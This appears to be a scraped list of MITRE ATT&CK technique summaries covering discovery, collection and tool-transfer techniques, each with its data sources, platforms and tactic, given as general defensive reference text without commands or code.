Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre